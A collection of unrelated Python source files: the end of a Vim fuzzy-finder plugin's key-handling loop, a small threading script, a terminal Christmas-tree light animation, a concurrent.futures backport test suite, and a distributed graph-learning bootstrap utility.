self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
|
track_thread.py
|
from threading import Thread
from streaming import Start_stream
from time import sleep
th = Thread(target=Start_stream)
th.start()
while(1):
sleep(5)
print('d')
|
tree.py
|
#!/usr/bin/env python3
import threading
import random
import os
import time
mutex = threading.Lock()
tree = list(open('tree2.txt').read().rstrip())
def colored_dot(color):
if color == 'red':
return f'\033[91m●\033[0m'
if color == 'green':
return f'\033[92m●\033[0m'
if color == 'yellow':
return f'\033[93m●\033[0m'
if color == 'blue':
return f'\033[94m●\033[0m'
def lights(color, indexes):
off = True
while True:
for idx in indexes:
tree[idx] = colored_dot(color) if off else '☆'
mutex.acquire()
os.system('cls' if os.name == 'nt' else 'clear')
print(''.join(tree))
mutex.release()
off = not off
time.sleep(random.uniform(.5, 1.5))
yellow = []
red = []
green = []
blue = []
for i, c in enumerate(tree):
if c == 'Y':
yellow.append(i)
tree[i] = '●'
if c == 'R':
red.append(i)
tree[i] = '●'
if c == 'G':
green.append(i)
tree[i] = '●'
if c == 'B':
blue.append(i)
tree[i] = '●'
ty = threading.Thread(target=lights, args=('yellow', yellow), daemon=True)
tr = threading.Thread(target=lights, args=('red', red), daemon=True)
tg = threading.Thread(target=lights, args=('green', green), daemon=True)
tb = threading.Thread(target=lights, args=('blue', blue), daemon=True)
for t in [ty, tr, tg, tb]:
t.start()
for t in [ty, tr, tg, tb]:
t.join()
|
test_futures.py
|
import os
import subprocess
import sys
import threading
import functools
import contextlib
import logging
import re
import time
import gc
import traceback
from StringIO import StringIO
from test import test_support
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor)
from concurrent.futures.thread import cpu_count
try:
import unittest2 as unittest
except ImportError:
import unittest
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
If threading is unavailable this function does nothing.
"""
@functools.wraps(func)
def decorator(*args):
key = test_support.threading_setup()
try:
return func(*args)
finally:
test_support.threading_cleanup(*key)
return decorator
# Executing the interpreter in a subprocess
def _assert_python(expected_success, *args, **env_vars):
cmd_line = [sys.executable]
if not env_vars:
cmd_line.append('-E')
# Need to preserve the original environment, for in-place testing of
# shared library builds.
env = os.environ.copy()
# But a special flag that can be set to override -- in this case, the
# caller is responsible to pass the full environment.
if env_vars.pop('__cleanenv', None):
env = {}
env.update(env_vars)
cmd_line.extend(args)
p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
try:
out, err = p.communicate()
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
rc = p.returncode
err = strip_python_stderr(err)
if (rc and expected_success) or (not rc and not expected_success):
raise AssertionError(
"Process return code is %d, "
"stderr follows:\n%s" % (rc, err.decode('ascii', 'ignore')))
return rc, out, err
def assert_python_ok(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
variables `env_vars` is ok and return a (return code, stdout, stderr) tuple.
"""
return _assert_python(True, *args, **env_vars)
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(r"\[\d+ refs\]\r?\n?$".encode(), "".encode(), stderr).strip()
return stderr
@contextlib.contextmanager
def captured_stderr():
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
logging_stream = StringIO()
handler = logging.StreamHandler(logging_stream)
logging.root.addHandler(handler)
try:
yield logging_stream
finally:
logging.root.removeHandler(handler)
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError:
e = sys.exc_info()[1]
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test_support.verbose:
print("%.2fs" % dt)
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest(unittest.TestCase):
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import %s
from time import sleep
from test_futures import sleep_and_print
t = %s(5)
t.submit(sleep_and_print, 1.0, "apple")
""" % (self.executor_type.__name__, self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), "apple".encode())
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join(5)
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join(5)
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
t.join(5)
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
self.assertRegexpMatches(t.name, r'^SpecialPool_[0-4]$')
t.join(5)
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegexpMatches(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join(5)
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes:
p.join(5)
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes:
p.join(5)
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
gc.collect()
gc.collect()
queue_management_thread.join(5)
for p in processes:
p.join(5)
class WaitTests(unittest.TestCase):
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=1.5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
fs = set(self.executor.submit(future_func) for i in range(100))
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setcheckinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests):
pass
class AsCompletedTests(unittest.TestCase):
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests):
pass
class ExecutorTest(unittest.TestCase):
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(next(i), (0, 1))
self.assertEqual(next(i), (0, 1))
self.assertRaises(ZeroDivisionError, next, i)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 3],
timeout=1.5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaises(ValueError) as cm:
self.executor_type(max_workers=number)
assert str(cm.exception) == "max_workers must be greater than 0"
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertEqual(len(finished), 10)
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(cpu_count() or 1) * 5)
def test_thread_initializer(self):
initialized = []
def initializer(i):
initialized.append(i)
executor = self.executor_type(initializer=initializer, initargs=(1,))
executor.submit(time.sleep, 1)
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
self.assertEqual(initialized, [1, 1])
def test_broken_thread_initializer(self):
def broken_initializer(i):
raise ValueError()
executor = self.executor_type(initializer=broken_initializer)
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1).result()
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest):
pass
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result[0])
def test_done_callback_with_exception(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_with_cancel(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled[0])
def test_done_callback_raises(self):
with captured_stderr() as stderr:
raising_was_called = [False]
raising_old_style_was_called = [False]
fn_was_called = [False]
def raising_fn(callback_future):
raising_was_called[0] = True
raise Exception('doh!')
def raising_old_style_fn(callback_future):
raising_old_style_was_called[0] = True
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
raise OldStyle()
def fn(callback_future):
fn_was_called[0] = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(raising_old_style_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(raising_old_style_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
self.assertIn('OldStyle: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result[0])
def test_done_callback_already_failed(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_already_cancelled(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled[0])
def test_repr(self):
self.assertRegexpMatches(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=pending>')
self.assertRegexpMatches(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=running>')
self.assertRegexpMatches(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished raised IOError>')
self.assertRegexpMatches(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=IOError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
IOError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = IOError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), IOError))
def test_old_style_exception(self):
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
callback_exc_info = [None]
def fn(callback_future):
callback_exc_info[0] = callback_future.exception_info()
f = Future()
f.add_done_callback(fn)
try:
raise OldStyle()
except OldStyle:
want_exc_info = sys.exc_info()
f.set_exception_info(*want_exc_info[1:])
self.assertEqual(f.exception_info(), want_exc_info[1:])
self.assertEqual(callback_exc_info[0], want_exc_info[1:])
try:
f.result()
except OldStyle:
got_exc_info = sys.exc_info()
else:
self.fail('OldStyle exception not raised')
self.assertEqual(got_exc_info[:2], want_exc_info[:2])
got_tb = traceback.extract_tb(got_exc_info[2])
want_tb = traceback.extract_tb(want_exc_info[2])
self.assertEqual(got_tb[-len(want_tb):], want_tb)
@reap_threads
def test_main():
try:
test_support.run_unittest(ProcessPoolExecutorTest,
ThreadPoolExecutorTest,
ProcessPoolWaitTests,
ThreadPoolWaitTests,
ProcessPoolAsCompletedTests,
ThreadPoolAsCompletedTests,
FutureTests,
ProcessPoolShutdownTest,
ThreadPoolShutdownTest)
finally:
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
utils.py
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
import warnings
import multiprocessing as mp
import torch
import torch.distributed as dist
SERVER_LAUNCHED = False
CLUSTER_SPEC = None
WORLD_SIZE = None
RANK = None
NUM_CLIENT = None
def get_world_size():
global WORLD_SIZE
if WORLD_SIZE is None:
if dist.is_initialized():
WORLD_SIZE = dist.get_world_size()
else:
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1))
return WORLD_SIZE
def get_rank():
global RANK
if RANK is None:
if dist.is_initialized():
RANK = dist.get_rank()
else:
RANK = int(os.getenv('RANK', 0))
return RANK
def get_num_client():
global NUM_CLIENT
if NUM_CLIENT is None:
NUM_CLIENT = int(os.getenv('GL_NUM_CLIENT', 1))
return NUM_CLIENT
def get_cluster_spec():
global CLUSTER_SPEC
if CLUSTER_SPEC is None:
world_size = get_world_size()
rank = get_rank()
num_client = get_num_client()
gl_server_info = bootstrap(world_size, rank)
CLUSTER_SPEC = {"server": gl_server_info, 'client_count': world_size * num_client}
return CLUSTER_SPEC
def set_client_num(n):
assert isinstance(n, int), 'client_num should be int, not {}'.format(str(type(n)))
global NUM_CLIENT
if NUM_CLIENT is not None:
warnings.warn('graph learn client number has been configured')
else:
NUM_CLIENT = n
def bootstrap(world_size, rank):
def get_free_port(host='127.0.0.1'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
sock.close()
return port
def addr_to_tensor(ip, port):
addr_array = [int(i) for i in (ip.split('.'))] + [int(port)]
addr_tensor = torch.tensor(addr_array, dtype=torch.int)
return addr_tensor
def tensor_to_addr(tensor):
addr_array = tensor.tolist()
addr = '.'.join([str(i) for i in addr_array[:-1]]) + ':' + str(addr_array[-1])
return addr
def exchange_gl_server_info(addr_tensor ,world_size, rank):
comm_tensor = torch.zeros([world_size, 5], dtype=torch.int32)
comm_tensor[rank] = addr_tensor
if dist.get_backend() == dist.Backend.NCCL:
comm_tensor = comm_tensor.cuda()
dist.all_reduce(comm_tensor, op=dist.ReduceOp.MAX)
cluster_server_info = ','.join([tensor_to_addr(t) for t in comm_tensor])
return cluster_server_info
if not dist.is_initialized():
raise RuntimeError('graph learn bootstrap relies on torch.distributed, which is not initilaized.')
local_ip = socket.gethostbyname(socket.gethostname())
port = str(get_free_port(local_ip))
gl_server_info = exchange_gl_server_info(addr_to_tensor(local_ip, port), world_size, rank)
return gl_server_info
def _server_manager(graph, cluster, task_index):
graph.init(cluster=cluster, job_name="server", task_index=task_index)
graph.wait_for_close()
def launch_server(g, cluster=None, task_index=None):
global SERVER_LAUNCHED
if SERVER_LAUNCHED:
raise RuntimeError('duplicate server launch detected')
if cluster is None:
cluster = get_cluster_spec()
task_index = get_rank()
elif task_index is None:
raise UserWarning('task_index should be explicitly defined when cluster defined by user')
p = mp.Process(target=_server_manager, args=(g, cluster, task_index, ))
p.daemon = True
p.start()
SERVER_LAUNCHED = True
